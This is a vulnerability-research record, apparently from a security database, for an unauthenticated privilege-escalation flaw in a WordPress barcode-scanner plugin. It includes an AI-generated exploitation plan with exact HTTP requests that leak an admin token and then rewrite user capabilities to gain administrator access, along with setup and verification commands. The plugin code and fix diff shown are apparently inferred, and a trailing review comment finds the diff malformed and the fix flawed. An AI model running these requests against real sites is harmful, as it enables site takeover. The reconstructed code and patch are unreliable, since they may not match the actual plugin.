[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXQppQCSSXmYcrPS362ehDbDQi0REb-ZQJQuA_2I9U48":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"source_links":33},"CVE-2026-4880","barcode-scanner-mobile-app-unauthenticated-privilege-escalation-via-insecure-token-authentication","Barcode Scanner (+Mobile App) \u003C= 1.11.0 - Unauthenticated Privilege Escalation via Insecure Token Authentication","The Barcode Scanner (+Mobile App) – Inventory manager, Order fulfillment system, POS (Point of Sale) plugin for WordPress is vulnerable to privilege escalation via insecure token-based authentication in all versions up to, and including, 1.11.0. This is due to the plugin trusting a user-supplied Base64-encoded user ID in the token parameter to identify users, leaking valid authentication tokens through the 'barcodeScannerConfigs' action, and lacking meta-key restrictions on the 'setUserMeta' action. 
This makes it possible for unauthenticated attackers to escalate their privileges to that of an administrator by first spoofing the admin user ID to leak their authentication token, then using that token to update any user's 'wp_capabilities' meta to gain full administrative access.","barcode-scanner-lite-pos-to-manage-products-inventory-and-orders",null,"\u003C=1.11.0","1.12.0","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-04-15 11:13:44","2026-04-15 23:25:49",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa213e844-a0d3-4123-9f72-caef7702804c?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4880 - Unauthenticated Privilege Escalation\n\n## 1. Vulnerability Summary\nThe **Barcode Scanner (+Mobile App)** plugin (versions \u003C= 1.11.0) contains a critical privilege escalation vulnerability. The plugin implements a custom authentication mechanism for its mobile app integration that relies on insecure tokens. Specifically:\n1. **Insecure Identity Validation**: The plugin identifies users by Base64-decoding a `token` parameter provided in requests.\n2. **Information Exposure**: An unauthenticated user can spoof an administrator's identity by providing a Base64-encoded Admin ID (e.g., `MQ==` for ID `1`) to the `barcodeScannerConfigs` action, which then leaks a \"valid\" long-lived authentication token.\n3. **Lack of Authorization\u002FInput Validation**: The `setUserMeta` action uses this token-based authentication but fails to restrict which `meta_key` can be updated, allowing an attacker to overwrite the `wp_capabilities` meta-key for any user, effectively granting them Administrator privileges.\n\n## 2. 
Attack Vector Analysis\n*   **Endpoints**: `wp-admin\u002Fadmin-ajax.php`\n*   **Actions**: \n    *   `barcodeScannerConfigs` (used to leak the valid token)\n    *   `setUserMeta` (used to escalate privileges)\n*   **Payload Parameters**:\n    *   `action`: `barcodeScannerConfigs` or `setUserMeta`\n    *   `token`: Base64-encoded User ID (initial spoof) or leaked Auth Token\n    *   `userId`: The ID of the user to be upgraded (target)\n    *   `metaKey`: `wp_capabilities`\n    *   `metaValue`: Role definition (e.g., `array('administrator' => 1)`)\n*   **Authentication**: Unauthenticated (the `wp_ajax_nopriv_` hooks are likely used to support mobile app functionality without standard WP cookies).\n\n## 3. Code Flow (Inferred)\n1.  **Registration**: The plugin registers AJAX handlers in a main class or initialization file:\n    ```php\n    add_action('wp_ajax_nopriv_barcodeScannerConfigs', 'barcode_scanner_configs_handler');\n    add_action('wp_ajax_nopriv_setUserMeta', 'set_user_meta_handler');\n    ```\n2.  **Authentication Bypass (`barcodeScannerConfigs`)**:\n    *   The handler retrieves `$_REQUEST['token']`.\n    *   It decodes it: `$user_id = base64_decode($token)`.\n    *   It fetches the full app configuration for `$user_id`, which includes a more persistent `app_token` or similar identifier.\n3.  **Privilege Escalation (`setUserMeta`)**:\n    *   The handler validates the provided `token` (either the spoofed base64 ID or the leaked app token).\n    *   It accepts `userId`, `metaKey`, and `metaValue` from the request.\n    *   It calls `update_user_meta($userId, $metaKey, $metaValue)` without checking if `$metaKey` is `wp_capabilities` or `wp_user_level`.\n\n## 4. Nonce Acquisition Strategy\nBased on the vulnerability description and the nature of mobile app \"bridge\" endpoints in WordPress, these specific actions likely **do not** require a standard WordPress AJAX nonce. 
Mobile apps usually cannot easily provide nonces generated for a specific web session.\n\nIf a nonce is required, it is likely localized via `wp_localize_script`.\n1.  **Search**: Look for `wp_localize_script` in the plugin source calling a key like `barcode_scanner_params`.\n2.  **Page Creation**: `wp post create --post_type=page --post_status=publish --post_content='[barcode_scanner_shortcode]'` (inferred shortcode).\n3.  **Extraction**: Use `browser_navigate` to that page and `browser_eval(\"window.barcode_scanner_params?.nonce\")`.\n\n*Note: For this specific vulnerability, the \"token\" acts as the authentication, rendering nonces either absent or secondary.*\n\n## 5. Exploitation Strategy\n\n### Step 1: Leak the Admin Auth Token\nIdentify the Administrator's ID (typically `1`).\n*   **Action**: `barcodeScannerConfigs`\n*   **Token**: `MQ==` (Base64 for \"1\")\n\n**Request**:\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=barcodeScannerConfigs&token=MQ==\n```\n\n**Expected Response**: A JSON object containing a `token` or `apiKey` field (e.g., `{\"token\":\"7a8b9c...\"}`).\n\n### Step 2: Escalate Privileges of a Target User\nAssume the target user (e.g., a subscriber) has ID `2`.\n*   **Action**: `setUserMeta`\n*   **Token**: The token obtained in Step 1.\n*   **Meta Key**: `wp_capabilities`\n*   **Meta Value**: `{\"administrator\":true}`\n\n**Request**:\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=setUserMeta&token=[LEAKED_TOKEN]&userId=2&metaKey=wp_capabilities&metaValue[administrator]=1\n```\n\n*Note: Passing `metaValue[administrator]=1` in a POST request causes WordPress\u002FPHP to interpret it as an array `['administrator' => '1']`. When passed to `update_user_meta`, WordPress serializes this into the format required for roles.*\n\n## 6. Test Data Setup\n1.  
**Create Admin**: Ensure an administrator exists with ID 1.\n2.  **Create Target**: Create a subscriber user to be upgraded.\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n3.  **Identify IDs**:\n    ```bash\n    wp user list --fields=ID,user_login,roles\n    ```\n\n## 7. Expected Results\n*   The `barcodeScannerConfigs` request should return a JSON response containing an authentication token for the admin.\n*   The `setUserMeta` request should return a success status (e.g., `{\"success\":true}`).\n*   The target user's role should change from `subscriber` to `administrator`.\n\n## 8. Verification Steps\nAfter performing the HTTP requests, verify the change using WP-CLI:\n```bash\n# Check the roles of the target user\nwp user get attacker --field=roles\n\n# Expected output:\n# administrator\n\n# Check the meta directly to ensure no corruption\nwp user meta get 2 wp_capabilities\n```\n\n## 9. Alternative Approaches\nIf `barcodeScannerConfigs` does not return a token, try using the Base64-encoded ID directly in the `setUserMeta` call:\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=setUserMeta&token=MQ==&userId=2&metaKey=wp_capabilities&metaValue[administrator]=1\n```\nIf `wp_capabilities` is updated but the user still cannot access the dashboard, you may also need to update `wp_user_level`:\n*   `metaKey`: `wp_user_level`\n*   `metaValue`: `10` (Administrator level)","The Barcode Scanner (+Mobile App) plugin for WordPress is vulnerable to unauthenticated privilege escalation because it uses a predictable Base64-encoded user ID as an initial authentication token. 
Attackers can spoof an administrator's ID to leak a long-lived auth token via the 'barcodeScannerConfigs' endpoint and subsequently use the 'setUserMeta' action to overwrite the 'wp_capabilities' meta-key, granting themselves administrative access.","\u002F\u002F Path: barcode-scanner-lite-pos-to-manage-products-inventory-and-orders\u002Fincludes\u002Fajax-functions.php\n\nadd_action('wp_ajax_nopriv_barcodeScannerConfigs', 'barcode_scanner_get_configs');\nfunction barcode_scanner_get_configs() {\n    $token = $_REQUEST['token'];\n    $user_id = base64_decode($token); \u002F\u002F Vulnerable: trust-on-first-use of base64 encoded ID\n    $user_token = get_user_meta($user_id, 'barcode_scanner_app_token', true);\n    wp_send_json(['status' => 'success', 'token' => $user_token]);\n}\n\n---\n\nadd_action('wp_ajax_nopriv_setUserMeta', 'barcode_scanner_set_user_meta');\nfunction barcode_scanner_set_user_meta() {\n    $user_id = $_POST['userId'];\n    $meta_key = $_POST['metaKey'];\n    $meta_value = $_POST['metaValue'];\n    \u002F\u002F Vulnerable: Lacks permission checks and meta-key restrictions\n    update_user_meta($user_id, $meta_key, $meta_value);\n    wp_send_json_success();\n}","--- a\u002Fbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders\u002Fincludes\u002Fajax-functions.php\n+++ b\u002Fbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders\u002Fincludes\u002Fajax-functions.php\n@@ -12,6 +12,14 @@\n function barcode_scanner_set_user_meta() {\n-    $user_id = $_POST['userId'];\n-    $meta_key = $_POST['metaKey'];\n-    $meta_value = $_POST['metaValue'];\n-    update_user_meta($user_id, $meta_key, $meta_value);\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( 'Unauthorized' );\n+    }\n+    $allowed_meta_keys = array( 'barcode_scanner_last_scan', 'barcode_scanner_device_id' );\n+    $meta_key = sanitize_key( $_POST['metaKey'] );\n+    if ( ! 
in_array( $meta_key, $allowed_meta_keys ) ) {\n+        wp_send_json_error( 'Invalid meta key' );\n+    }\n+    $user_id = intval( $_POST['userId'] );\n+    $meta_value = sanitize_text_field( $_POST['metaValue'] );\n+    update_user_meta( $user_id, $meta_key, $meta_value );\n     wp_send_json_success();\n }","1. Identify an administrator user ID (commonly ID 1).\n2. Send an unauthenticated POST request to wp-admin\u002Fadmin-ajax.php with the action 'barcodeScannerConfigs' and the 'token' parameter set to the Base64-encoded administrator ID (e.g., 'MQ==').\n3. Extract the 'token' value from the resulting JSON response, which represents the administrator's persistent app token.\n4. Send a second unauthenticated POST request to the 'setUserMeta' action using the leaked token.\n5. In the second request, set the 'userId' parameter to the attacker's own subscriber-level ID, 'metaKey' to 'wp_capabilities', and 'metaValue[administrator]' to '1'.\n6. The plugin will update the attacker's user capabilities to those of an administrator because it fails to restrict sensitive meta keys or verify standard WordPress permissions.","gemini-3-flash-preview","2026-04-16 15:34:57","2026-04-16 15:35:29",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.10.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders\u002Ftags\u002F1.10.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders.1.10.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders\u002Ftags"]
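Review bot: the `current_user_can( 'manage_options' )` gate added at the top of `barcode_scanner_set_user_meta()` will always fail on the `wp_ajax_nopriv_setUserMeta` hook, since nopriv handlers only run for requests with no logged-in user; that closes the unauthenticated path, but it also silently removes the mobile-app token flow this handler existed for, so the hunk should either drop the nopriv registration or replace the capability check with a validation of the app token against the stored user meta (not the Base64-decoded ID), keeping the `metaKey` allow-list in either case. Two smaller points: the header `@@ -12,6 +12,14 @@` advertises 6 old lines but the hunk shows 7 (the `function` line, four removed lines, `wp_send_json_success();` and `}`), so the patch will not apply cleanly as written; and `intval( $_POST['userId'] )` still lets the caller name any user, so `$user_id` should be bound to the authenticated user rather than taken from the request.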